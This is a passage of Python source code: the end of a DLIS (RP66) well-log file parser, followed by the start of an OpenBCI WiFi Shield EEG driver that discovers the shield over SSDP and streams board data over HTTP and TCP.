cls.objects.get(cls.current_file_number)[object_name] = []
current_lr = cls.get_logical_records()[-1]
cls.object_to_lr.get(cls.current_file_number)[object_name] = current_lr.get('type')
cls.lr_to_object.get(cls.current_file_number).get(current_lr.get('type')).append(object_name)
@classmethod
def get_logical_records(cls, file_number=None):
if file_number is None:
file_number = cls.current_file_number
return list(cls.lrs.get(file_number).values())
@classmethod
def get_logical_record(cls, lr_type, file_number=None):
for lr in cls.get_logical_records(file_number):
if lr.get('type') == lr_type:
return lr
return None
@classmethod
def get_objects_of_type(cls, lr_type, file_number=None):
if file_number is None:
file_number = cls.current_file_number
obj_names = cls.lr_to_object.get(file_number).get(lr_type)
ret_map = OrderedDict()
if not obj_names:
return ret_map
for obj_name in obj_names:
ret_map[obj_name] = cls.objects.get(cls.current_file_number).get(obj_name)
return ret_map
@classmethod
def get_objects_dict_of_type(cls, lr_type, file_number=None):
if file_number is None:
file_number = cls.current_file_number
ret_map = OrderedDict()
objects = cls.get_objects_of_type(lr_type, file_number)
if not objects:
return ret_map
template_list = cls.get_logical_record(lr_type, file_number).get('template')
for obj_name, obj_values in objects.items():
obj_map = OrderedDict()
for idx, value in enumerate(obj_values):
# print 'idx', idx, template_list[idx]
obj_map[template_list[idx].get('name')] = value
ret_map[obj_name] = obj_map
return ret_map
@classmethod
def get_object_values_list(cls, object_name, file_number=None):
"""Given a object name (e.g 0&0&WN or 1&0&RHOB) return its values list.
If file_number is not given, the latest one will be used.
"""
if file_number is None:
file_number = cls.current_file_number
obj_values_list = cls.objects.get(file_number).get(object_name)
return obj_values_list
@classmethod
def get_object_values_dict(cls, object_name, file_number=None):
if file_number is None:
file_number = cls.current_file_number
obj_values_list = cls.get_object_values_list(object_name, file_number)
if obj_values_list is None:
return None
lr_type = cls.object_to_lr.get(file_number).get(object_name)
ret_map = OrderedDict()
for set_map in list(cls.lrs.get(file_number).values()):
if set_map.get('type') == lr_type:
for idx, template in enumerate(set_map.get('template')):
try:
ret_map[template.get('name')] = obj_values_list[idx]
except IndexError:
return ret_map
return ret_map
def _get_SUL(data):
# Getting Storage Unit Label (SUL)
if len(data) != 80 and len(data) != 128:
raise Exception('Unexpected input data size (expected 80 or 128 bytes).')
SUL = OrderedDict()
SUL['Storage unit sequence number'] = data[0:4].decode("utf-8").strip()
SUL['RP66 version and format edition'] = data[4:9].decode("utf-8").strip()
SUL['Storage unit structure'] = data[9:15].decode("utf-8").strip()
if SUL.get('RP66 version and format edition').split('.')[0] == 'V1':
SUL['Maximum visible record length'] = data[15:20].decode("utf-8").strip()
SUL['Storage set identifier'] = data[20:80].decode("utf-8").strip()
elif SUL.get('RP66 version and format edition').split('.')[0] == 'V2':
if len(data) == 80:
raise Exception('DLIS version 2 needs 128 bytes for Storage Unit Label (SUL).')
SUL['Binding edition'] = data[15:19].decode("utf-8").strip()
SUL['Maximum visible record length'] = data[19:29].decode("utf-8").strip()
SUL['Producer organization code'] = data[29:39].decode("utf-8").strip()
SUL['Creation date'] = data[39:50].decode("utf-8").strip()
SUL['Serial number'] = data[50:62].decode("utf-8").strip()
SUL['reserved'] = data[62:68].decode("utf-8").strip()
SUL['Storage set identifier'] = data[68:128].decode("utf-8").strip()
return SUL
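# Illustrative only -- a V1 Storage Unit Label decodes to fields like:
#     {'Storage unit sequence number': '1',
#      'RP66 version and format edition': 'V1.00',
#      'Storage unit structure': 'RECORD',
#      'Maximum visible record length': '8192',
#      'Storage set identifier': 'Default Storage Set'}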
class DLISFile(object):
def __init__(self):
RepresentationCodes.start()
# base_path == this folder
base_path = os.path.dirname(os.path.abspath(__file__))
mapping_file = 'DLIS_RP66V1_MAPPING.json'
self.mapping = app.app_utils.read_json_file(
os.path.join(base_path, mapping_file)
)
#
self._clear()
def _clear(self):
#
DLISObjectPool.init_pool()
#
self.SUL = None
self.file_size = -1
self.data = None
self.data_props = None
#
self.file_header = None
self.origin = None
self.parameter = None
self.frame = None
self.channel = None
#
# self.queue = Queue()
#
def get_file_read_percent(self):
if self.file_size == -1:
return 0
return float(self.file.tell()) * 100 / self.file_size
@staticmethod
def is_DLIS_file(filename):
try:
file_ = open(filename, mode='rb')
# Getting Storage Unit Label (SUL)
SUL = _get_SUL(file_.read(128))
file_.close()
if SUL.get('RP66 version and format edition').split('.')[0] != 'V1' \
and SUL.get('RP66 version and format edition').split('.')[0] != 'V2':
return False
return True
except Exception:
return False
def print_logical_file(self, file_index=None, limit=None):
if file_index is None:
file_index = range(len(self.data))
elif file_index == -1:
file_index = range(len(self.data) - 1, len(self.data), 1)
elif file_index >= 0 and file_index < len(self.data):
file_index = range(file_index, file_index + 1, 1)
else:
raise Exception()
if limit is not None:
counter = 1
for idx in file_index:
datum = self.data[idx]
print('\n\nLogical File:', idx)
for object_name, object_dict in datum.items():
print('\n', object_name)
for data_idx, data_values in object_dict.items():
print('\n ', data_idx)
for i, v in enumerate(data_values):
print(' ', list(self.data_props[idx].get(object_name).keys())[i], \
': ', v, list(self.data_props[idx].get(object_name).values())[i].get('UNITS'))
if limit is not None:
if counter == limit:
msg = '\nLimit of ' + str(limit) + ' records was reached. End of print.'
print(msg)
return
else:
counter += 1
print('\nEnd of print.')
'''
def read(self, filename, callback=None, threading_stop_event=None):
#t = threading.Thread(target=self._read, args=(filename, callback))
#t.start()
#t.join()
p = Process(target=self._read, args=(filename, callback))
p.start()
p.join()
'''
def read(self, filename, callback=None, threading_stop_event=None):
# Clear DLISObjectPool
DLISObjectPool.init_pool()
#
self.filename = filename
# self.callback = callback
self.file = open(self.filename, mode='rb')
self.file_size = os.fstat(self.file.fileno()).st_size
# Getting Storage Unit Label (SUL)
self.SUL = _get_SUL(self.file.read(128))
# print()
# print(self.SUL)
# print()
if self.SUL.get('RP66 version and format edition').split('.')[0] == 'V1':
self.file.seek(80)
elif self.SUL.get('RP66 version and format edition').split('.')[0] != 'V2':
raise Exception('This is not a DLIS File.')
#
self._read_Logical_Records(callback, threading_stop_event)
# self._reading_process = Process(target=self._read_Logical_Records,
# args=(stop_event, 'task'))
# print 'a', self.file.tell()
# self._reading_process.start()
# print 'b', self.file.tell(), self._reading_process.is_alive()
# self._reading_process.join()
# print 'c', self.file.tell(), self._reading_process.is_alive()
#
self.file.close()
#
self._load_file_header_props()
self._load_origin_props()
self._load_parameter_props()
self._load_frame_props()
self._load_channel_props()
#
if threading_stop_event:
if threading_stop_event.is_set():
print('File reading canceled by user.')
else:
self.print_logical_file(-1, 1)
else:
self.print_logical_file(-1, 1)
#
print('\n\nself.data_props')
print(self.data_props)
# TODO: review self._curves_info
self._curves_info = OrderedDict()
for item_od in self.data_props:
for curve_set_name in list(item_od.keys()):
curve_info_od = item_od[curve_set_name]
curve_set_name = get_actual_objname(curve_set_name)
self._curves_info[curve_set_name] = []
for curve_name, curve_props_od in curve_info_od.items():
curve_actual_name = get_actual_objname(curve_name)
curve_unit = curve_props_od['UNITS'].lower()
self._curves_info[curve_set_name].append(
(curve_actual_name, curve_unit)
)
#
print('\n\nself._curves_info')
print(self._curves_info)
#
# print('\n\nself.data')
# print(self.data)
#
# """
# TODO: review self._curves_data
self._curves_data = OrderedDict()
for curve_set_name, curves_info_list in self._curves_info.items():
self._curves_data[curve_set_name] = []
for idx in range(len(curves_info_list)):
self._curves_data[curve_set_name].append([])
#
for item_od in self.data:
for iflr_descriptor in list(item_od.keys()):
curve_data_od = item_od[iflr_descriptor]
curve_set_name = get_actual_objname(iflr_descriptor)
for curves_data_list in list(curve_data_od.values()):
for idx, value in enumerate(curves_data_list):
# print('idx val:', idx, value)
self._curves_data[curve_set_name][idx].append(value)
#
for curves_data_list in list(self._curves_data.values()):
for idx in range(len(curves_data_list)):
curves_data_list[idx] = np.asarray(curves_data_list[idx])
"""
print('\n\nself._curves:')
for curve_set_name, curves_data_list in self._curves_data.items():
print()
print('CURVE_SET:', curve_set_name)
print()
for idx in range(len(curves_data_list)):
print()
print(self._curves_info[curve_set_name][idx])
print(self._curves_data[curve_set_name][idx])
"""
def _load_file_header_props(self):
self.file_header = self._get_logical_record_props('FILE-HEADER')
def _load_origin_props(self):
self.origin = OrderedDict()
origin_od = self._get_logical_record_props('ORIGIN')
# Index 0 has all the info we really need. Others are used when there
# are copies, as stated by RP66 V1.
if not origin_od:
return
# print('\n\n\norigin_od:', origin_od)
# print('\n\n\n')
try:
obj_name, obj_map = list(origin_od.items())[0]
print(obj_name)
print(obj_map)
for key, value in obj_map.items():
# print('kv:', key, value)
self.origin[key] = value
except:
raise
# print('END _load_origin_props')
def _load_parameter_props(self):
self.parameter = OrderedDict()
params_od = self._get_logical_record_props('PARAMETER')
if not params_od:
return
for obj_name, obj_dict in params_od.items():
self.parameter[get_actual_objname(obj_name)] = obj_dict['VALUES']
def _load_frame_props(self):
self.frame = OrderedDict()
frame_od = self._get_logical_record_props('FRAME')
if not frame_od:
return
for obj_name, obj_dict in frame_od.items():
frame_obj_od = OrderedDict()
self.frame[get_actual_objname(obj_name)] = frame_obj_od
frame_obj_od['CHANNELS'] = []
for chan_obj_name in obj_dict.pop('CHANNELS'):
frame_obj_od['CHANNELS'].append(get_actual_objname(chan_obj_name))
for key, value in obj_dict.items():
frame_obj_od[key] = value
def _load_channel_props(self):
self.channel = OrderedDict()
channel_od = self._get_logical_record_props('CHANNEL')
if not channel_od:
return
for obj_name, obj_dict in channel_od.items():
self.channel[get_actual_objname(obj_name)] = obj_dict['UNITS']
def _get_logical_record_props(self, lr_type):
try:
lr_props = OrderedDict()
lr_od = DLISObjectPool.get_objects_dict_of_type(lr_type)
if not lr_od:
return lr_props
for obj_name, obj_map in lr_od.items():
obj_lr_od = OrderedDict()
lr_props[obj_name] = obj_lr_od
for key, value in obj_map.items():
if isinstance(value, list) and len(value) == 1:
obj_lr_od[key] = value[0]
else:
obj_lr_od[key] = value
except Exception as e:
print('ERROR:', e)
lr_props = OrderedDict()
#
# print()
# print(lr_type)
# for obj_name, obj_map in lr_props.items():
# print(' ', obj_name)
# for key, value in obj_map.items():
# print(' ', key, value)
# print()
#
#
return lr_props
'''
def stop_reading(self):
if self._reading_process.is_alive():
self._reading_process.terminate()
self._clear()
self.file.close()
'''
def _read_Logical_Records(self, callback=None, threading_stop_event=None):
print('\n\n\nENTERED _read_Logical_Records')
print('self.data_props:', self.data_props)
print('\n\n\n')
lr_data = b''
current_obj_name = None
i = 0
while self.file.tell() < self.file_size:
if threading_stop_event:
if threading_stop_event.is_set():
break
# i += 1
if callback:
callback(self.get_file_read_percent())
# "Visible Record consists of Visible Envelope Data plus one
# or more Logical Record Segments"
# VED - Visible Envelope Data
VED = OrderedDict()
ved_data = self.file.read(self.mapping.get('VED').get('size'))
vr_offset = 0
for item in self.mapping.get('VED').get('data'):
vr_offset, value = get_from_list(ved_data, vr_offset, item.get('code'))
# value = value.decode("utf-8")
if item.get('name') == 'The value FF16':
if value != 255:
msg = 'Expected value FF16 on byte ' + str(self.file.tell() - 2)
raise Exception(msg)
else:
VED[item.get('name')] = value
# elif item.get('name') == 'Format version':
# if str(value) != self.SUL.get('RP66 version and format edition').split('.')[0].split('V')[1]:
# raise Exception('Version on Visible Record is not the same on Storage Unit Label.')
# Obtaining Visible Record end offset
end_vr_offset = self.file.tell() + VED.get('Visible Record Length') - 4
# Getting Logical Record Segments from Visible Record
# A Logical Record Segment is composed of four mutually disjoint parts:
# (1) a Logical Record Segment Header,
# (2) an optional Logical Record Segment Encryption Packet,
# (3) a Logical Record Segment Body, and
# (4) an optional Logical Record Segment Trailer.
print('\n\n\n002 _read_Logical_Records')
print('self.data_props:', self.data_props)
print('\n\n\n')
while self.file.tell() < end_vr_offset:
# (1) Logical Record Segment Header
lrs_header = OrderedDict()
lrs_header_data = self.file.read(self.mapping.get('LRSH').get('size'))
lrs_header_offset = 0
for item in self.mapping.get('LRSH').get('data'):
lrs_header_offset, value = get_from_list(lrs_header_data, lrs_header_offset, item.get('code'))
# value = value.decode("utf-8")
lrs_header[item.get('name')] = value
lrs_body_size = lrs_header.get('Logical Record Segment Length') - 4
# Calculating Logical Record Segment Trailer (LRST) size
lrst_size = 0
# Trailing Length
if lrs_header.get('Logical Record Segment Attributes')[6]:
lrst_size += 2
# Checksum
if lrs_header.get('Logical Record Segment Attributes')[5]:
lrst_size += 2
# Padding
if lrs_header.get('Logical Record Segment Attributes')[7]:
tmp_offset = self.file.tell()
self.file.seek(self.file.tell() + lrs_body_size - (lrst_size + 1))
_, pad_count = get_from_list(self.file.read(1), 0, 15)
self.file.seek(tmp_offset)
else:
pad_count = 0
lrst_size += pad_count
# (2) Logical Record Segment Encryption Packet (LRSEP)
if lrs_header.get('Logical Record Segment Attributes')[3] or \
lrs_header.get('Logical Record Segment Attributes')[4]:
raise Exception('Logical Record is encrypted')
#
# (3) Logical Record Segment Body (LRSB)
lr_data += self.file.read(lrs_body_size - lrst_size)
# If the LRSB has no Successor, the Logical Record (LR)
# is ready to be processed. Otherwise another LRSB
# will be appended to the LR.
if not lrs_header.get('Logical Record Segment Attributes')[2]:
# It's time to work on logical record
lr_data_offset = 0
while lr_data_offset < len(lr_data):
# Explicitly Formatted Logical Records (EFLR)
if lrs_header.get('Logical Record Segment Attributes')[0] == 1:
# print("EFLR")
role, definition = self.get_EFLR_process_descriptor(
lr_data[lr_data_offset:lr_data_offset + 1])
lr_data_offset += 1
if role == 'ABSATR':
if not DLISObjectPool.get_logical_records()[-1].get('closed'):
DLISObjectPool.get_logical_records()[-1].get('template').append(None)
else:
DLISObjectPool.get_object_values_list(current_obj_name).append(None)
continue
map_ = OrderedDict()
for key, (has_key, code) in definition.items():
if has_key:
if code:
lr_data_offset, value = get_from_list(lr_data, lr_data_offset, code)
# value = value.decode("utf-8")
# print('code:', key, value, role)
# print()
map_[key] = value
else:
# Reading Value
if key == 'V':
if not map_.get('C'):
map_['C'] = 1
values = []
# Firstly, trying to use value code
if map_.get('R') is not None:
code = map_.get('R')
else:
pos = len(DLISObjectPool.get_object_values_dict(current_obj_name))
template = DLISObjectPool.get_logical_records()[-1].get('template')[pos]
# Secondly, trying to use template code for value
if template.get('code') is not None:
code = template.get('code')
# Otherwise, use default code recommended by RP66_V1
else:
code = 19
for i in range(map_.get('C')):
lr_data_offset, value = get_from_list(lr_data, lr_data_offset, code)
if isinstance(value, str):
value = value.strip()
elif code == 23:
value = get_objname_from_tuple(value)
values.append(value)
# print('not code: V', values, role)
map_['V'] = values
else:
raise Exception()
if role == 'SET':
# Resetting data_props used in IFLR Frame Data
if map_.get('T') == 'FILE-HEADER':
# print('FILE-HEADER')
if self.data_props is None:
self.data_props = []
if self.data is None:
self.data = []
print('FILE-HEADER:', len(self.data_props))
# Appending new 'spaces' for log properties
# and for log data. We will have one list
# of properties and one dict of data for
# each DLIS Logical File.
# Frame Data Prop list will be compiled
# at logical file first IFLR.
# Data dict will be constructed on every IFLR frame data
# """
self.data_props.append(None)
# """
self.data.append(OrderedDict())
DLISObjectPool.register_logical_record(
1,
map_.get('T'),
lrs_header.get('Logical Record Type')
)
current_obj_name = None
elif role == 'ATTRIB':
if not DLISObjectPool.get_logical_records()[-1].get('closed'):
new_template = OrderedDict()
new_template['name'] = map_.get('L')
new_template['unit'] = map_.get('U')
new_template['code'] = map_.get('R')
DLISObjectPool.get_logical_records()[-1].get('template').append(new_template)
else:
# print('current_obj_name:', current_obj_name, map_.get('V'))
DLISObjectPool.get_object_values_list(current_obj_name).append(map_.get('V'))
elif role == 'OBJECT':
current_obj_name = get_objname_from_tuple(map_.get('N'))
DLISObjectPool.register_object(current_obj_name)
else:
# DLISObjectPool.printa()
# print()
# print(role, definition, current_obj_name, self.file.tell())
raise Exception()
# Indirectly Formatted Logical Records (IFLR)
else:
# print("IFLR")
lr_data_offset, obj_name = get_from_list(lr_data, lr_data_offset, 23)
iflr_descriptor = get_objname_from_tuple(obj_name)
# If LRT for IFLR is 127, then we have an EOD -> Nothing to do!
if lrs_header.get('Logical Record Type') == 127:
if lr_data_offset == len(lr_data):
break
else:
raise Exception('ERROR: Found an IFLR EOD with LR data still to be read.')
if self.data_props[-1] is None:
print('\n\n\n')
print('self.data_props[-1] is None')
print('\n\n\n')
print('self.data_props:', self.data_props)
print('\n\n\n')
channel_objects = DLISObjectPool.get_objects_dict_of_type('CHANNEL')
print('\nchannel_objects:', channel_objects)
frame_objects = DLISObjectPool.get_objects_dict_of_type('FRAME')
print('\nframe_objects:', frame_objects)
frame_data_prop = OrderedDict()
self.data_props[-1] = frame_data_prop
print('\n\nself.data_props[-1]:', self.data_props[-1])
print('\n\n\n')
#
for frame_obj_name, frame_obj_props in frame_objects.items():
frame_props = OrderedDict()
frame_data_prop[frame_obj_name] = frame_props
for idx, channel_name in enumerate(frame_obj_props.get('CHANNELS')):
channel_props = OrderedDict()
frame_props[channel_name] = channel_props
for frame_key, frame_value in frame_obj_props.items():
if frame_key != 'CHANNELS': # No need to insert channel again
try:
frame_value = frame_value[idx]
except Exception:
frame_value = None
channel_props[frame_key] = frame_value
for channel_key, channel_value in channel_objects.get(channel_name).items():
if channel_key == 'AXIS' and channel_value is not None:
axis_props = OrderedDict()
axis_objects = DLISObjectPool.get_objects_dict_of_type('AXIS')
print('\naxis_objects:', axis_objects)
for axis_object_name in channel_value:
axis_props[axis_object_name] = OrderedDict()
for axis_key, axis_value in axis_objects.get(
axis_object_name).items():
if isinstance(axis_value, list):
if len(axis_value) == 1:
axis_value = axis_value[0]
axis_props.get(axis_object_name)[axis_key] = axis_value
channel_value = axis_props
elif isinstance(channel_value, list):
if len(channel_value) == 1:
channel_value = channel_value[0]
channel_props[channel_key] = channel_value
# TODO: Review the code below, reordering self.data
while lr_data_offset < len(lr_data):
if self.data[-1].get(iflr_descriptor) is None:
self.data[-1][iflr_descriptor] = OrderedDict()
lr_data_offset, idx = get_from_list(lr_data, lr_data_offset, 18)
list_ = []
self.data[-1].get(iflr_descriptor)['#' + str(idx)] = list_
if self.data_props[-1].get(iflr_descriptor):
for channel_name, channel_props in self.data_props[-1].get(iflr_descriptor).items():
code = channel_props.get('REPRESENTATION-CODE')
if channel_props.get('DIMENSION') == 1:
lr_data_offset, value = get_from_list(lr_data, lr_data_offset, code)
else:
value = []
for i in range(channel_props.get('DIMENSION')):
lr_data_offset, v = get_from_list(lr_data, lr_data_offset, code)
value.append(v)
list_.append(value)
# End of IFLR
# End of Logical Record processing - Clearing lr_data
lr_data = b''
# (4) Logical Record Segment Trailer (LRST)
# Bypassing pad bytes
if pad_count:
self.file.seek(pad_count, 1)
# Bypassing checksum
if lrs_header.get('Logical Record Segment Attributes')[5]:
self.file.seek(2, 1)
# Bypassing trailing length
if lrs_header.get('Logical Record Segment Attributes')[6]:
self.file.seek(2, 1)
else:
if callback:
callback(self.get_file_read_percent())
# percent = float("{0:.2f}".format(self.get_file_read_percent()))
# msg = 'Read: ' + str(percent) + '%'
# print msg
# for fileno, map_ in DLISObjectPool.objects.items():
# print()
# print('file number:', fileno)
# lrs = DLISObjectPool.get_logical_records(fileno)
# print()
# for lr in lrs:
# type_name = lr.get('type')
# print(' ', type_name)
# objs = DLISObjectPool.get_objects_dict_of_type(type_name)
# for obj_name, obj_map in objs.items():
# print(' ', obj_name)
# for k, v in obj_map.items():
# print(' ', k, v)
# print()
# print()
# print()
# print('ending...')
# for k, v in map_.items():
# print(' ', k, v)
def get_EFLR_process_descriptor(self, descriptor_data):
if len(descriptor_data) != 1:
raise Exception()
v1 = ord(descriptor_data)
result = bin(v1)[2:].zfill(8)
if result[0:3] == '000':
role = 'ABSATR'
elif result[0:3] == '001':
role = 'ATTRIB'
elif result[0:3] == '010':
role = 'INVATR'
elif result[0:3] == '011':
role = 'OBJECT'
elif result[0:3] == '100':
role = 'reserved'
elif result[0:3] == '101':
role = 'RDSET'
elif result[0:3] == '110':
role = 'RSET'
elif result[0:3] == '111':
role = 'SET'
attr = OrderedDict()
if role in ['SET', 'RSET', 'RDSET']:
if result[3:4] == '1':
attr['T'] = (True, 19)
else:
attr['T'] = (False, None)
if result[4:5] == '1':
attr['N'] = (True, 19)
else:
attr['N'] = (False, None)
elif role == 'OBJECT':
if result[3:4] == '1':
attr['N'] = (True, 23)
else:
attr['N'] = (False, None)
elif role in ['ATTRIB', 'INVATR']:
if result[3:4] == '1':
attr['L'] = (True, 19)
else:
attr['L'] = (False, None)
if result[4:5] == '1':
attr['C'] = (True, 18)
else:
attr['C'] = (False, None)
if result[5:6] == '1':
attr['R'] = (True, 15)
else:
attr['R'] = (False, 19)
if result[6:7] == '1':
attr['U'] = (True, 27)
else:
attr['U'] = (False, None)
if result[7:8] == '1':
attr['V'] = (True, None)
else:
attr['V'] = (False, None)
return role, attr
# Definition of Characteristics and Component Format for Set,
# Redundant Set, and Replacement Set Components
"""
000 ABSATR Absent Attribute
001 ATTRIB Attribute
010 INVATR Invariant Attribute
011 OBJECT Object
100 reserved -
101 RDSET Redundant Set
110 RSET Replacement Set
111 SET Set
"""
if __name__ == '__main__':
# app = wx.App(False)
filename = 'DLISOut_TMT001D.dlis'
# filename = 'qqcoisa.dlis'
# filename = 'Sample2.dlis'
# filename = '57-438A_1_1.dlis'
# filename = '311-U1325A_ecoscope.dlis'
dlis = DLISFile()
dlis.read(filename)
|
wifi_origin.py
|
"""
Core OpenBCI object for handling connections and samples from the WiFi Shield
Note that the library will print incoming ASCII messages on its own, if any (FIXME).
EXAMPLE USE:
def handle_sample(sample):
print(sample.channels_data)
wifi = OpenBCIWifi()
wifi.start(handle_sample)
TODO: Cyton/Ganglion JSON
TODO: Ganglion Raw
TODO: Cyton Raw
"""
import asyncore
import atexit
import json
import logging
import re
import socket
import timeit
import threading
try:
import urllib2
except ImportError:
import urllib
import requests
import xmltodict
import numpy as np
from openbci.utils import k, ParseRaw, OpenBCISample, ssdp
SAMPLE_RATE = 0 # Hz
'''
#Commands for in SDK
command_stop = "s";
command_startBinary = "b";
'''
class OpenBCIWiFi(object):
"""
Handle a connection to an OpenBCI wifi shield.
Args:
ip_address: The IP address of the WiFi Shield, "None" to attempt auto-detect.
shield_name: The unique name of the WiFi Shield, such as `OpenBCI-2AD4`, will use SSDP to get IP address still,
if `shield_name` is "None" and `ip_address` is "None", will connect to the first WiFi Shield found using SSDP
        sample_rate: The sample rate to set the attached board to. If the requested rate is not one the attached
            board supports, e.g. sending 300 to a Cyton, an error will be thrown.
log:
        timeout: in seconds, disconnect / reconnect after a period without new data -- should be high if impedance checking is enabled
max_packets_to_skip: will try to disconnect / reconnect after too many packets are skipped
"""
def __init__(self, ip_address='192.168.4.1', shield_name=None, sample_rate=250, log=True, timeout=3,
max_packets_to_skip=20, latency=10000, high_speed=True, ssdp_attempts=5,
num_channels=8):
        # these attributes are used throughout the class
self.daisy = True
self.gains = None
self.high_speed = high_speed
self.impedance = False
self.ip_address = ip_address
self.latency = latency
self.log = log # print_incoming_text needs log
self.max_packets_to_skip = max_packets_to_skip
self.num_channels = num_channels
self.sample_rate = sample_rate
self.shield_name = shield_name
self.ssdp_attempts = ssdp_attempts
self.streaming = False
self.timeout = timeout
self.timer_start = 0
self.timer_end = 0
# might be handy to know API
self.board_type = "none"
# number of EEG channels
self.eeg_channels_per_sample = 0
self.read_state = 0
self.log_packet_count = 0
self.packets_dropped = 0
self.time_last_packet = 0
if self.log:
print("Welcome to OpenBCI Native WiFi Shield Driver - Please contribute code!")
self.local_ip_address = self._get_local_ip_address()
# Intentionally bind to port 0
self.local_wifi_server = WiFiShieldServer(self.local_ip_address, 80)
self.local_wifi_server_port = self.local_wifi_server.socket.getsockname()[1]
#self.local_wifi_server_1 = WiFiShieldServer(self.local_ip_address, 100)
#self.local_wifi_server_port_1 = self.local_wifi_server_1.socket.getsockname()[1]
if self.log:
print("Opened socket on %s:%d" % (self.local_ip_address, self.local_wifi_server_port))#ip and port
'''
self.local_wifi_server.socket.setblocking(1)
while True:
clientsocket, address = self.local_wifi_server.socket.accept()
data = clientsocket.recv(1)
if not data:
pass
else:
print("First client send: " + str(data))
clientsocket.close()
break
self.timer_start = timeit.default_timer()
self.thread = threading.Thread(target=self.handler, args=(1,))
self.thread.start()
'''
        if ip_address is None:  # try to find a suitable IP address
for i in range(ssdp_attempts):
try:
self.find_wifi_shield(wifi_shield_cb=self.on_shield_found)
break
except OSError:
# Try again
if self.log:
print("Did not find any WiFi Shields")
else:
self.on_shield_found(ip_address)
    def handler(self, num):
        # NOTE: relies on self.local_wifi_server_1 and
        # self.local_wifi_server_port_1, which are only created in the
        # commented-out block in __init__ above; only reachable from there.
print('start doing work of thread')
if self.log:
print("Opened socket on %s:%d" % (self.local_ip_address, self.local_wifi_server_port_1))#ip and port
self.local_wifi_server_1.socket.setblocking(1)
while True:
clientsocket, addr = self.local_wifi_server_1.socket.accept()
data = clientsocket.recv(1)
if data:
print("Second client send: " + str(data))
self.stop()
clientsocket.close()
print('finish thread')
break
def on_shield_found(self, ip_address):
self.ip_address = ip_address
self.connect()
# Disconnects from board when terminated
atexit.register(self.disconnect)
def loop(self):
asyncore.loop()
def _get_local_ip_address(self):
"""
Gets the local ip address of this computer
@returns str Local IP address
"""
        # A UDP connect() sends no packets; it only selects the outgoing
        # interface, whose address we then read back.
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
local_ip_address = s.getsockname()[0]
s.close()
return local_ip_address
def getBoardType(self):
""" Returns the version of the board """
return self.board_type
def setImpedance(self, flag):
""" Enable/disable impedance measure """
self.impedance = bool(flag)
def connect(self):
""" Connect to the board and configure it. Note: recreates various objects upon call. """
if self.ip_address is None:
raise ValueError('self.ip_address cannot be None')
if self.log:
print("Init WiFi connection with IP: " + self.ip_address)
"""
Docs on these HTTP requests and more are found:
https://app.swaggerhub.com/apis/pushtheworld/openbci-wifi-server/1.3.0
"""
#requests.get->board
res_board = requests.get("http://%s/board" % self.ip_address)
if res_board.status_code == 200:
board_info = res_board.json()
if not board_info['board_connected']:
raise RuntimeError("No board connected to WiFi Shield. To learn how to connect to a Cyton or Ganglion visit http://docs.openbci.com/Tutorials/03-Wifi_Getting_Started_Guide")
self.board_type = board_info['board_type']
self.eeg_channels_per_sample = board_info['num_channels']
if self.log:
print("Connected to %s with %s channels" % (self.board_type, self.eeg_channels_per_sample))#cyton , 16
self.gains = None
if self.board_type == k.BOARD_CYTON:
self.gains = [24, 24, 24, 24, 24, 24, 24, 24]
self.daisy = False
elif self.board_type == k.BOARD_DAISY:
self.gains = [24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24, 24]
self.daisy = True
elif self.board_type == k.BOARD_GANGLION:
self.gains = [51, 51, 51, 51]
self.daisy = False
self.local_wifi_server.set_daisy(daisy=self.daisy)
self.local_wifi_server.set_parser(ParseRaw(gains=self.gains, board_type=self.board_type))
if self.high_speed:
output_style = 'raw'
else:
output_style = 'json'
        # requests.post: register this machine's TCP server with the shield via HTTP
res_tcp_post = requests.post("http://%s/tcp" % self.ip_address,
json={
'ip': self.local_ip_address,
'port': self.local_wifi_server_port,
'output': output_style,
'delimiter': True,
'latency': self.latency
})
        # The HTTP status code indicates whether the request completed.
        if res_tcp_post.status_code == 200:  # 200: success; the body describes the result of the action
tcp_status = res_tcp_post.json()
print('tcp_status',tcp_status)
if tcp_status['connected']:
if self.log:
print("WiFi Shield to Python TCP Socket Established")#TCP Socket
else:
raise RuntimeWarning("WiFi Shield is not able to connect to local server. Please open an issue.")
def init_streaming(self):
""" Tell the board to record like crazy. """
# used to request data from a specified resource
res_stream_start = requests.get("http://%s/stream/start" % self.ip_address)
if res_stream_start.status_code == 200:
self.streaming = True
self.packets_dropped = 0
self.time_last_packet = timeit.default_timer()
else:
raise EnvironmentError("Unable to start streaming. Check API for status code %d on /stream/start" % res_stream_start.status_code)
def find_wifi_shield(self, shield_name=None, wifi_shield_cb=None):
"""Detects Ganglion board MAC address -- if more than 1 around, will select first. Needs root privilege."""
if self.log:
print("Try to find WiFi shields on your local wireless network")
print("Scanning for %d seconds nearby devices..." % self.timeout)
list_ip = []
list_id = []
found_shield = False
def wifi_shield_found(response):
res = requests.get(response.location, verify=False).text
device_description = xmltodict.parse(res)
cur_shield_name = str(device_description['root']['device']['serialNumber'])
cur_base_url = str(device_description['root']['URLBase'])
cur_ip_address = re.findall(r'[0-9]+(?:\.[0-9]+){3}', cur_base_url)[0]
list_id.append(cur_shield_name)
list_ip.append(cur_ip_address)
            found_shield = True  # NOTE: binds a new local; the outer found_shield is never updated
if shield_name is None:
print("Found WiFi Shield %s with IP Address %s" % (cur_shield_name, cur_ip_address))
if wifi_shield_cb is not None:
wifi_shield_cb(cur_ip_address)
else:
if shield_name == cur_shield_name:
if wifi_shield_cb is not None:
wifi_shield_cb(cur_ip_address)
ssdp_hits = ssdp.discover("urn:schemas-upnp-org:device:Basic:1", timeout=self.timeout, wifi_found_cb=wifi_shield_found)
nb_wifi_shields = len(list_id)
if nb_wifi_shields < 1:
print("No WiFi Shields found ;(")
raise OSError('Cannot find OpenBCI WiFi Shield with local name')
if nb_wifi_shields > 1:
print(
"Found " + str(nb_wifi_shields) +
", selecting first named: " + list_id[0] +
" with IPV4: " + list_ip[0])
return list_ip[0]
def wifi_write(self, output):
"""
Pass through commands from the WiFi Shield to the Carrier board
:param output:
:return:
"""
res_command_post = requests.post("http://%s/command" % self.ip_address,
json={'command': output})
if res_command_post.status_code == 200:
ret_val = res_command_post.text
if self.log:
print(ret_val)
return ret_val
else:
if self.log:
print("Error code: %d %s" % (res_command_post.status_code, res_command_post.text))
raise RuntimeError("Error code: %d %s" % (res_command_post.status_code, res_command_post.text))
def getSampleRate(self):
return self.sample_rate
def getNbEEGChannels(self):
"""Will not get new data on impedance check."""
return self.eeg_channels_per_sample
def start_streaming(self, callback, lapse=-1):
"""
